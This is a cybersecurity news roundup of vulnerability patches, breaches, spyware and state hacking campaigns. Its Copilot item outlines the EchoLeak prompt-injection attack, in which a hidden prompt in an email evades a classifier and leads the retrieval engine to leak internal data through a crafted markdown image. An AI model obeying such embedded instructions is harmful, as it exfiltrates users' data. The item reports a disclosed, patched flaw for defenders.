Hacking the Hackers: When Bad Guys Let Their Guard Down

A string of operational security failures by threat actors has unexpectedly empowered defenders in what’s being dubbed “Hacking the Hackers.” According to Dark Reading’s analysis, live leaks of memory footprints and internal communications—often resulting from poor cleanup or disgruntled insiders—have provided defenders with direct visibility into the playbooks of malware and ransomware groups like DanaBot, Black Basta, and Conti . These lapses let researchers reconstruct attack sequences, tooling choices, and command-and-control (C2) infrastructures with clarity rarely afforded. Notably, this trend emphasizes that sometimes cyber defenders gain an upper hand not through flawless attacks, but thanks to threat actors’ own mistakes. This shift enables more proactive defense measures, including early detection signatures and threat hunting routines built on adversary-specific artifacts. The analysis highlights how vigilant defenders are increasingly “hacking the hackers” by exploiting adversaries’ carelessness to enhance organizational resilience.

(Dark Reading)

GitLab patches multiple vulnerabilities in its DevSecOps platform

GitLab has issued urgent security updates to patch multiple vulnerabilities in its DevSecOps platform. The flaws include account takeover risks and the ability for attackers to inject malicious jobs into CI/CD pipelines. The fixes are included in GitLab versions 18.0.2, 17.11.4, and 17.10.8. Critical issues addressed include HTML injection (CVE-2025-4278), missing authorization (CVE-2025-5121), cross-site scripting (CVE-2025-2254), and a denial-of-service flaw (CVE-2025-0673). GitLab.com is already patched, and users of self-managed instances are urged to upgrade immediately.

(Bleeping Computer)

Researchers unveil a covert method for exfiltrating data using smartwatches

Researchers in Israel have unveiled “SmartAttack,” a covert method for exfiltrating data from air-gapped systems using smartwatches. The attack involves malware on a secure, isolated computer emitting ultrasonic signals via built-in speakers. These inaudible tones, modulated to carry data, are picked up by a smartwatch microphone worn nearby. The watch then transmits the data via Wi-Fi, Bluetooth, or cellular networks. Though challenging and theoretical, the attack shows how insider threats can bypass physical isolation. Experts recommend banning smartwatches and disabling speakers in sensitive areas to mitigate risk.

(TechCrunch)

Erie Insurance has confirmed a cyberattack as the root cause of recent operational disruptions, raising concerns about potential data exposure

The Pennsylvania-based insurer acknowledged that a June 2024 cybersecurity incident was responsible for delays and interruptions to its customer services. Although the company has not disclosed the exact nature of the attack, it confirmed the involvement of an unauthorized third party and is actively working with forensic experts to investigate the scope of the breach. Erie has also involved law enforcement and taken steps to restore normal operations. At this time, it’s unclear whether customer or employee data was compromised, but the company promises to notify affected individuals should any data exposure be confirmed. This incident highlights the growing risk that cyberattacks pose to financial services organizations, which are often prime targets for threat actors seeking sensitive personal information.

(BleepingComputer)

Google Cloud and Cloudflare outages reported

Google Cloud and Cloudflare suffered outages yesterday, affecting services such as Google Home/Nest, SnapChat, Discord, Shopify and Spotify, as well as creating access authentication failures and Cloudflare Zero Trust WARP connectivity issues. Downdetector received tens of thousands of reports, with impacted users experiencing Cloudflare and Google Cloud server connection, website, and hosting problems. The issue started around 1:15 p.m. ET and was being resolved through the afternoon.

(The Verge)

 

Journalists are confirmed targets of Paragon’s Graphite spyware

A forensic investigation by Citizen Lab has confirmed that Paragon’s Graphite spyware was used in zero-click attacks targeting iPhones of at least two journalists in Europe. The attacks exploited a then-unknown vulnerability with a CVE number (CVE-2025-43200) in iOS 18.2.1, which allowed malicious photos or videos shared via iCloud Links to compromise devices. Apple notified the victims on April 29, identifying the spyware as “advanced.” The Graphite platform is believed to be part of Paragon’s mercenary spyware operations. The flaw has since been patched by Apple.

(BleepingComputer)

Librarian Ghouls’ Cyberattackers Strike at Night

A stealthy threat group known as “Librarian Ghouls” has been quietly targeting Russian organizations in a prolonged cyberespionage campaign.
According to Kaspersky researchers, the group has operated since at least December 2024 and focuses on stealing sensitive data while minimizing its digital footprint. Librarian Ghouls employs “living-off-the-land” techniques, using legitimate administrative tools like 4t Tray Minimizer and Mipko employee monitoring software to blend into normal system activity and avoid detection. They launch their attacks during off-hours—primarily at night and on weekends—reducing the likelihood of triggering alarms. The attackers also leverage PowerShell scripts and custom info-stealers to extract data, particularly targeting email communications. This campaign exemplifies the increasing sophistication of threat actors who avoid traditional malware in favor of covert, tool-based persistence.

(Darkreading)

AI-powered “ghost students” enrolling in online college courses to steal government funds

Financial aid fraud is on the rise, fueled by identity theft and AI-powered “ghost students” enrolling in online college courses to steal government funds. Criminals use stolen personal data to apply for grants and loans, often enrolling in community colleges where low tuition means more aid goes directly to students. In 2024 alone, California colleges reported 1.2 million fake applications, leading to over 223,000 suspected fraudulent enrollments and at least $11.1 million in unrecoverable aid. Victims often learn about the fraud only after seeing credit score drops or loan notifications. Clearing their names can take years. To combat the trend, the U.S. Education Department now requires ID verification for new aid applicants. However, federal staffing cuts may undermine efforts to detect and prevent these increasingly sophisticated scams.

(SecurityWeek)

Mozilla  patches two critical FireFox security flaws

Mozilla has released Firefox 139.0.4 to patch two critical security flaws that could crash the browser or allow hackers to run malicious code. The first, CVE-2025-49709, involves memory corruption in Firefox’s canvas rendering system. If triggered by specially crafted web content, it could let attackers exploit memory issues and compromise browser stability. The second flaw, CVE-2025-49710, is an integer overflow in Firefox’s JavaScript engine, specifically in the OrderedHashTable structure. This could lead to heap buffer overflows and similar risks when handling JavaScript-heavy websites. Both vulnerabilities are rated high severity with CVSS scores over 8. Mozilla urges users and enterprise admins to update to version 139.0.4 immediately via the built-in updater or Mozilla’s website to protect against potential exploitation.

(Cyber Security News)

Zero-click data leak flaw in Copilot

Researchers at Aim Labs documented a flaw in Microsoft 365 Copilot dubbed EchoLeak, part of an emerging class of “LLM Scope Violation” vulnerabilities. By sending an email with a hidden prompt injection in an otherwise banal business email, the researchers could get around Microsoft’s cross-prompt injection attack classifier protections. When a user later asks about the email, the Retrieval-Augmented Generation, or RAG engine, pulls in the malicious injection, inserting internal data into a crafted markdown image and sending it to a third-party server. Aim Labs reported the issue to Microsoft back in January, which subsequently issued a server-side fix in May.

(Fortune, Bleeping Computer)

Friendly skies…or friendly spies? 

It turns out the major U.S. airlines—yes, the ones that can’t find your luggage—have been quietly selling your domestic flight data to Customs and Border Protection (CBP). An investigative report from 404 Media reveals that through a data broker the airlines own called ARC, airlines shared names, itineraries, and payment info, all while telling CBP not to mention them by name. This cloak-and-dagger data deal, documented through FOIA requests, supports tracking “persons of interest” without pesky things like warrants. The program, known as the Travel Intelligence Program, updates daily and holds over a billion records. Civil liberties advocates are, unsurprisingly, unimpressed. One called it a digital-age revival of the “collect it all” mentality. Meanwhile, Congress is starting to ask airlines why their loyalty programs apparently come with complimentary government surveillance.

Turn out, when it comes to data collection…the sky’s the limit.

(404 Media)

Five zero-day vulnerabilities in Salesforce Industry Cloud are uncovered

Security researchers at AppOmni uncovered five zero-day vulnerabilities and 15 serious misconfigurations in Salesforce Industry Cloud, potentially impacting tens of thousands of organizations. Salesforce Industry Cloud offers low-code tools tailored for sectors like healthcare, finance, and government, but its ease of use can lead to risky default settings. Three of the five flaws were fixed by Salesforce directly, while two require customer action. The remaining issues stem from common misconfiguration traps, often caused by non-technical users unknowingly applying insecure access settings. These missteps could lead to major data breaches, including exposure of sensitive health or financial data. AppOmni’s scans show these risks are widespread among Industry Cloud users, raising serious concerns about security in low-code enterprise platforms designed for speed and simplicity.

(SecurityWeek)

PoC Code escalates Roundcube Vuln threat

A critical Roundcube webmail flaw with a CVSS score of 9.9 is now a major threat after proof-of-concept code was publicly released. The 10-year-old bug lets authenticated attackers execute remote code via a malicious URL exploiting PHP’s object handling. Over 85,000 unpatched servers are exposed globally. Login credentials are required to exploit it, but attackers can pair it with older credential-theft bugs for full compromise. A patch is available , but researchers warn organizations to update immediately and monitor for malicious activity.

(Dark Reading)

SentinelOne rebuffed a China-linked “PurpleHaze” APT targeting its internal infrastructure

SentinelOne revealed that it was the target of a thwarted cyberattack in October 2024 by a group linked to Chinese nation-state actors, specifically associated with APT15 (also known as Ke3chang or Vixen Panda). The threat actor, referred to as “UNC5174” or “PurpleHaze,” was also found to have compromised over 70 global organizations spanning the defense, telecommunications, and IT sectors. The attackers used legitimate software tools and the ShadowPad malware framework to quietly infiltrate systems and conduct espionage. SentinelOne worked with international security partners to identify and warn affected victims, stressing the importance of proactive threat hunting and detection capabilities. The attack underscores the growing boldness of state-sponsored groups and the strategic value they place on targeting cybersecurity firms themselves.

(Cybersecurity Dive) 

Chinese hackers target U.S. smartphones 

A recent cyberattack targeting smartphones of U.S. officials and professionals in politics, tech, and journalism has raised alarms among cybersecurity experts. Investigators at iVerify linked the unusual crashes to a zero-click hack, likely by Chinese hackers, that allowed access to phones without user interaction. Victims had ties to fields of interest to China’s government.

Experts say smartphones, often less protected than other systems, are becoming key targets for espionage. Devices belonging to Donald Trump’s campaign and top aides were also reportedly targeted. Lawmakers fear Chinese state-owned firms could exploit their tech presence in global networks. The U.S. is responding with new initiatives like a “cyber trust mark” for secure connected devices. Still, officials warn that even the most secure device is vulnerable if users ignore basic precautions. Cyber lapses, like misconfigured apps or unsecured connections, remain a serious national security risk.

(Associated Press) 

United Natural Foods hit by cyberattack

The company confirmed it discovered a cyberattack on June 5, 2025, according to an 8-K filing with the US SEC. United Natural Foods is North America’s largest publicly traded wholesale food distributor, with 53 distribution centers. The company proactively took some systems offline due to the attack, disrupting customer orders. At the same time, anecdotal posts on social media mention some worker shifts cancelled as well. No ransomware group took credit for the attack, and the company has not released further details about any data loss or what systems the attacker accessed.

(Bleeping Computer)

Russian companies hit with LockBit

You don’t tug on Superman’s cape, you don’t spit into the wind, you don’t pull the mask off of old Lone Ranger, and you don’t have your ransomware affiliates attack Russia. Those used to be the rules. However, the Russian cybersecurity firm Positive Technologies identified a financially motivated group called DarkGaboon that was doing just that: deploying LockBit 3.0 ransomware. Unlike typical LockBit affiliates, DarkGaboon seems to operate entirely independently, using Russian-language phishing emails with malicious attachments claiming to have legitimate financial documents. Researchers say the group has appeared to operate since at least 2023, but its use of open-source tools in other parts of its attack chain made attribution difficult.

(The Record)

FBI keeps Leatherman in its back pocket

FBI Director Kash Patel named agency veteran Brett Leatherman as assistant director and head of the Cyber Division. During his 22-year career, Leatherman served as section chief for cyber investigations and deputy assistant director for the last three years and has been the FBI’s public face for communications on major cyber incidents going back to the Colonial Pipeline attack. He takes over for Bryan Vorndran, who left the FBI to work as Microsoft’s deputy CISO. Given the number of personnel shakeups across government cybersecurity posts since January, this is a notable bit of continuity.

(Cyberscoop)

Cloudflare creates OAuth library with Claude

Last week, Cloudflare published the open-sourced OAuth 2.1 library, which was written almost entirely by Anthropic’s Claude LLM. Notably, the company also published comprehensive documentation of the process, including a full prompt history. Due to the sensitive nature of the library, this wasn’t an exercise in vibe coding, with human review in all parts of the process. Software developer Max Mitchell reviewed the process, finding the LLM excelled when given a substantial code block to work off of, with clear context and explanation of what needed to be changed. In all instances, the LLM excelled at generating documentation. However, the code needed human intervention for styling and other housekeeping tasks. Mitchell suggested looking at this the same as collaborating with a human developer, expect a back and forth rather than one-off prompting success. Cloudflare tech lead Kenton Varda, who oversaw the project, came into it with a healthy dose of skepticism, but ended up saying, “I was trying to validate my skepticism. I ended up proving myself wrong.”

(Maxe Mitchell, Neil Madden, GitHub)

SecOps teams must combat AI “hallucinations” to improve threat detection accuracy  Dark Reading warns that while generative AI accelerates incident detection and response, model hallucinations can generate false positives, mislead analysts, or gap investigations. Organizations are advised to implement robust model evaluation, training for AI oversight, and processes to cross-check alerts and avoid operational inefficiencies.

(Dark Reading)

ESET uncovers Iranian hackers targeting Kurdish and Iraqi government officials

Iran-linked hackers, identified as BladedFeline, have been conducting a years-long cyberespionage campaign targeting Kurdish and Iraqi government officials, according to ESET. Believed to be a subgroup of Iran’s OilRig (APT34), BladedFeline has operated since at least 2017, initially breaching the Kurdistan Regional Government (KRG) and later expanding to Iraq’s central government and even a telecom provider in Uzbekistan. The group uses custom malware like Shahmaran, Whisper, and PrimeCache to spy on systems, exfiltrate data, and maintain remote access. Entry points likely include exploited server vulnerabilities and webshells. Researchers say the campaign likely supports Iran’s geopolitical goals by monitoring the KRG’s Western ties and countering U.S. influence in Iraq. OilRig has a history of targeting critical sectors and using compromised networks for supply chain attacks.

(The Record)

Hitachi Energy, Acronis and Cisco patch critical vulnerabilities

Hitachi Energy has patched two critical vulnerabilities (CVE-2020-35198 and CVE-2020-28895) in its Relion 670, 650 series, and SAM600-IO devices, which are widely used in power grid protection and control. The flaws could allow remote attackers to trigger memory corruption, risking grid stability. Hitachi Energy has released targeted updates and recommends users upgrade to secure revisions. No public exploitation has been reported, but mitigation steps are advised for older systems.

Acronis Cyber Protect users are urged to update immediately due to multiple critical vulnerabilities, including three with the highest CVSS score of 10.0. These flaws allow attackers to bypass authentication, access sensitive data, and escalate privileges. Updates have been available for a month. If updating isn’t possible right away, restrict network access and monitor systems for suspicious activity.

Cisco has patched 12 vulnerabilities across its products, including a critical flaw (CVE-2025-20286, CVSS 9.9) in cloud deployments of Identity Services Engine (ISE). This bug affects AWS, Azure, and Oracle Cloud ISE instances where shared credentials are improperly generated, allowing attackers to access sensitive data or modify configurations. No workarounds exist, and proof-of-concept (PoC) code is public. Cisco also addressed two high-severity SSH flaws in its IMC and Nexus Dashboard Fabric Controller (CVE-2025-20261 and CVE-2025-20163), which could allow unauthorized access or man-in-the-middle attacks. Additionally, nine medium-severity bugs were patched across various Cisco communication and management tools. Two have public PoC code, though no active exploitation is reported. Cisco strongly urges users to apply updates immediately.

(Beyond Machine, [1]  SecurityWeek)

Presidential cyber executive order signed

The President signed a new executive order aimed at refocusing U.S. cybersecurity policy by emphasizing secure software development, updated encryption, and internet routing security. The order revokes parts of Biden- and Obama-era directives, including digital identity initiatives, which it claims could increase fraud risks. It criticizes the previous administration for politicizing cybersecurity and shifts AI policy from potential censorship to identifying vulnerabilities. The order rolls back compliance mandates for software vendors, instead encouraging collaboration with industry partners. It also targets post-quantum cryptography and consumer device security.

(Cyberscoop)

OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation  The owner of ChatGPT says threat actors from countries such as China, Russia, North Korea, Iran, and the Philippines are using the LLM product for three key areas of activity: social media comment generation; malware refinement and cyberattack assistance; and foreign employment scams. One example: using ChatGPT to publish comments on topics such as U.S. politics, on TikTok, X, Reddit, Facebook, and other social media platforms and then shifting to other accounts that would reply to the same comments. They have also been using it to assist with writing scripts for brute-forcing passwords, as well in conducting employment scams, including arranging for delivery of company laptops.

(The Record)